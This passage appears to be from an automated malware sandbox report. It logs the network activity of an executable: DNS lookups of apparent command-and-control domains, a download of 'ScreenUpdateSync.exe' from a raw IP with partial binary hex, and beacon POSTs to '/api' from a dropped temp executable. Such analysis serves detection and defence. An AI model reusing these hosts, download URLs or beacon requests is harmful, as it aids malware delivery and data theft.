                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497220039 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497231007 CET49739443192.168.2.11104.21.96.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.497239113 CET44349739104.21.96.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.493549109 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.493596077 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.494050980 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.494457006 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.494467020 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.950508118 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.950634003 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.953453064 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.953475952 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.953721046 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:37.963565111 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.007358074 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895380974 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895407915 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895437956 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895498991 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895510912 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895545006 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:38.895570993 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096550941 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096626997 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096786022 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096807957 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.096859932 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104120016 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104229927 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104250908 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104324102 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104378939 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104557037 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104583025 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104595900 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104595900 CET49754443192.168.2.11104.102.49.254
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104604959 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:39.104613066 CET44349754104.102.49.254192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:08.285753965 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:08.598279953 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:09.207444906 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:10.431410074 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:12.863751888 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:17.723090887 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:10:27.426280975 CET4971180192.168.2.11176.113.115.19

                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.309937000 CET6225553192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.451951027 CET53622551.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:26.932851076 CET6512353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:27.071722031 CET53651231.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:27.080741882 CET5069553192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:27.472639084 CET53506951.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:31.890379906 CET6007053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET53600701.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.503971100 CET6200953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.641973972 CET53620091.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.645792007 CET5376153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.783914089 CET53537611.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.788539886 CET5595253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.929006100 CET53559521.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.932102919 CET4999153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.069973946 CET53499911.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.072145939 CET5075153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.210926056 CET53507511.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.213814020 CET6298753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.351950884 CET53629871.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.355035067 CET5386153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.492854118 CET53538611.1.1.1192.168.2.11

                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.309937000 CET192.168.2.111.1.1.10x3048Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:26.932851076 CET192.168.2.111.1.1.10x2ba4Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:27.080741882 CET192.168.2.111.1.1.10x2f29Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:31.890379906 CET192.168.2.111.1.1.10xebfStandard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.503971100 CET192.168.2.111.1.1.10xfb22Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.645792007 CET192.168.2.111.1.1.10x3af4Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.788539886 CET192.168.2.111.1.1.10x203cStandard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.932102919 CET192.168.2.111.1.1.10x2853Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.072145939 CET192.168.2.111.1.1.10x9a5Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.213814020 CET192.168.2.111.1.1.10x7b1fStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.355035067 CET192.168.2.111.1.1.10x2f05Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.451951027 CET1.1.1.1192.168.2.110x3048No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.451951027 CET1.1.1.1192.168.2.110x3048No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:27.071722031 CET1.1.1.1192.168.2.110x2ba4Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:27.472639084 CET1.1.1.1192.168.2.110x2f29No error (0)immureprech.biz104.21.22.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:27.472639084 CET1.1.1.1192.168.2.110x2f29No error (0)immureprech.biz172.67.207.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET1.1.1.1192.168.2.110xebfNo error (0)deafeninggeh.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET1.1.1.1192.168.2.110xebfNo error (0)deafeninggeh.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET1.1.1.1192.168.2.110xebfNo error (0)deafeninggeh.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET1.1.1.1192.168.2.110xebfNo error (0)deafeninggeh.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET1.1.1.1192.168.2.110xebfNo error (0)deafeninggeh.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET1.1.1.1192.168.2.110xebfNo error (0)deafeninggeh.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:32.035031080 CET1.1.1.1192.168.2.110xebfNo error (0)deafeninggeh.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.641973972 CET1.1.1.1192.168.2.110xfb22Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.783914089 CET1.1.1.1192.168.2.110x3af4Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:35.929006100 CET1.1.1.1192.168.2.110x203cName error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.069973946 CET1.1.1.1192.168.2.110x2853Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.210926056 CET1.1.1.1192.168.2.110x9a5Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.351950884 CET1.1.1.1192.168.2.110x7b1fName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:36.492854118 CET1.1.1.1192.168.2.110x2f05No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                        • post-to-me.com
                                                                                                                                                                                                                                                                        • immureprech.biz
                                                                                                                                                                                                                                                                        • deafeninggeh.biz
                                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                                        • 176.113.115.19

                                                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.1149711176.113.115.19807736C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.784470081 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: ShareScreen
                                                                                                                                                                                                                                                                        Host: 176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125427008 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 14 Dec 2024 13:08:21 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                        Last-Modified: Sat, 14 Dec 2024 13:00:02 GMT
                                                                                                                                                                                                                                                                        ETag: "58600-6293a86885370"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 361984
                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125515938 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d
                                                                                                                                                                                                                                                                        Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuuu9Et
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125566006 CET448INData Raw: 56 e8 cc 30 00 00 59 83 f8 ff 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 40 a3 81 00 eb 05 b9 08 4c 44 00 f6 41 24 7f 75 29 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 c1 f9 05 83 e0 1f c1 e0 06 03 04 8d 40 a3 81 00 eb 05 b8 08
                                                                                                                                                                                                                                                                        Data Ascii: V0Ytt@LDA$u)tt@LD@$tWWWWW%M9}uNxAV,YEEEuV5,YUQSVW5l5h}YY;+CrwW
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125576019 CET1236INData Raw: e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 60 10 00 00 c3 e8 15 25 00 00 c3 8b ff 55 8b ec ff 75 08 e8 b7 ff ff ff f7 d8 1b c0 f7 d8 59 48 5d c3 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 b1 32 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 83 3d 0c 6b
                                                                                                                                                                                                                                                                        Data Ascii: EE`%UuYH]Ujju2]U=kDu)u_'h$YY]jXh%D3uEP@Dj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CSYujXY
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125735044 CET1236INData Raw: c0 eb 51 6a 0a e8 59 00 00 00 59 89 5d fc 39 1e 75 2c 68 a0 0f 00 00 57 e8 a2 35 00 00 59 59 85 c0 75 17 57 e8 ac f4 ff ff 59 e8 3f fe ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 91 f4 ff ff 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b
                                                                                                                                                                                                                                                                        Data Ascii: QjYY]9u,hW5YYuWY?]>WYEEHj(YUEV4AD>uP"Yuj]Y6D^]U|kU+Pr;r3]UMAVuW+yiD
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125742912 CET1236INData Raw: c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 d8 10 44 00 85 c0 75 08 83 c8 ff e9 9d 00 00 00 8d 97 00 70 00 00 89 55 fc 3b fa 77 43 8b ca 2b cf c1 e9 0c 8d 47 10 41 83 48 f8 ff 83 88 ec 0f 00 00 ff 8d 90 fc 0f 00 00 89 10 8d 90 fc ef ff ff c7 40 fc
                                                                                                                                                                                                                                                                        Data Ascii: yhWDupU;wC+GAH@PIuUEOHAJHAdD3GFCENCux!P_^[UMASVuW}+QiDM
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125756025 CET1236INData Raw: 83 c1 04 eb e7 8b 55 fc 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4c 90 44 33 ff 23 ce 75 12 8b 8c 90 c4 00 00 00 23 4d f8 6a 20 5f eb 03 03 c9 47 85 c9 7d f9 8b 4d f4 8b 54 f9 04 8b 0a 2b 4d f0 8b f1 c1 fe 04 4e 83 fe 3f 89 4d f8
                                                                                                                                                                                                                                                                        Data Ascii: UiDMLD3#u#Mj _G}MT+MN?M~j?^;J;Ju\ }&M|8]#\D\Du3M]!,OM|8!]u]M!K]}JzyJzyMyJzQJ
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125762939 CET1236INData Raw: 74 03 33 c0 c3 b8 04 04 00 00 c3 b8 12 04 00 00 c3 b8 04 08 00 00 c3 b8 11 04 00 00 c3 8b ff 56 57 8b f0 68 01 01 00 00 33 ff 8d 46 1c 57 50 e8 80 2d 00 00 33 c0 0f b7 c8 8b c1 89 7e 04 89 7e 08 89 7e 0c c1 e1 10 0b c1 8d 7e 10 ab ab ab b9 a8 42
                                                                                                                                                                                                                                                                        Data Ascii: t3VWh3FWP-3~~~~BDF+@Ou@Nu_^U@D3ESWPvD3@;r t.;w+@Pj R
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125875950 CET1236INData Raw: 8b 43 04 e8 12 fb ff ff 89 43 0c 89 53 08 eb 03 89 73 08 33 c0 0f b7 c8 8b c1 c1 e1 10 0b c1 8d 7b 10 ab ab ab eb a8 39 35 8c 6f 44 00 0f 85 58 fe ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 33 e1 ff ff c9 c3 6a 14 68 58 26 44 00 e8 bb f7 ff ff 83
                                                                                                                                                                                                                                                                        Data Ascii: CCSs3{95oDXM_^3[3jhX&DM}_huuE;CWh YFwh#SuYYEuvhDuFh=BDtPY^hS=DFpGD
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125890017 CET1236INData Raw: 8b 70 6c 85 f6 75 08 6a 20 e8 b5 07 00 00 59 8b c6 e8 67 f3 ff ff c3 6a 0c e8 21 e8 ff ff 59 83 65 fc 00 8d 46 6c 8b 3d b0 48 44 00 e8 69 ff ff ff 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00 00 eb c1 6a 0c e8 1c e7 ff ff 59 8b 75 e4 c3 8b ff 55 8b
                                                                                                                                                                                                                                                                        Data Ascii: pluj Ygj!YeFl=HDiEEjYuUV5HD5Dt!HDtP5HDt'pDV$DuVYth`DPHDtuEE^]jYUV5HD5Dt!HDtP5HD
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.245464087 CET1236INData Raw: 0d 83 3d d4 6f 44 00 00 74 04 85 c0 75 24 a1 f0 10 44 00 a3 d0 6f 44 00 a1 fc 10 44 00 c7 05 cc 6f 44 00 9f 34 40 00 89 35 d4 6f 44 00 a3 d8 6f 44 00 ff 15 f4 10 44 00 a3 c4 48 44 00 83 f8 ff 0f 84 cc 00 00 00 ff 35 d0 6f 44 00 50 ff d6 85 c0 0f
                                                                                                                                                                                                                                                                        Data Ascii: =oDtu$DoDDoD4@5oDoDDHD5oDPM5oD5oDoD5oDoD5oDoDoDKteh6@5oD=YHDtHhjYYt4V5HD5oDYtj


                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.1149710104.21.56.704437736C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-14 13:08:19 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: ShareScreen
                                                                                                                                                                                                                                                                        Host: post-to-me.com
                                                                                                                                                                                                                                                                        2024-12-14 13:08:20 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 14 Dec 2024 13:08:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=keWj8a1QU%2BK9%2FrGMk4HqHVA3PmoEdMg4KpJ4pqAqmRWuP1wrAZFb1zuEF8Q%2FQ784wuMw0d%2F%2BKz0Gkl3DWci%2Ft0VnsxhL4TPAGcKS4U32tZCEuPZig3YBrS47BDlSdiVd7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f1e6c08cfa38cdd-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1963&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1467336&cwnd=161&unsent_bytes=0&cid=a388979225d3d464&ts=637&x=0"
                                                                                                                                                                                                                                                                        2024-12-14 13:08:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                                        2024-12-14 13:08:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.1149727104.21.22.2224437976C:\Users\user\AppData\Local\Temp\3247.tmp.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-14 13:08:28 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: immureprech.biz
                                                                                                                                                                                                                                                                        2024-12-14 13:08:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                        2024-12-14 13:08:31 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 14 Dec 2024 13:08:31 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=hbs1ol8sm9g15i0c5dtraoivm4; expires=Wed, 09-Apr-2025 06:55:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VN%2FJ16V2%2F5E3u0j%2FEFiK3Wl6idFgod5kNTbMb3gX4i8hNU5ZAiWsGBjg8jUPIA8qzMrSOhzhRsBuHrrtfDCco5TtlvEwFkeN6NSIuUEJ1zASURPPMgOSBr%2Bx%2FJK6pLZER%2FM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f1e6c41abe3c45c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1507&rtt_var=565&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1937624&cwnd=242&unsent_bytes=0&cid=29eddf12f5bb626d&ts=3145&x=0"
                                                                                                                                                                                                                                                                        2024-12-14 13:08:31 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                        2024-12-14 13:08:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.1149739104.21.96.14437976C:\Users\user\AppData\Local\Temp\3247.tmp.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-14 13:08:33 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
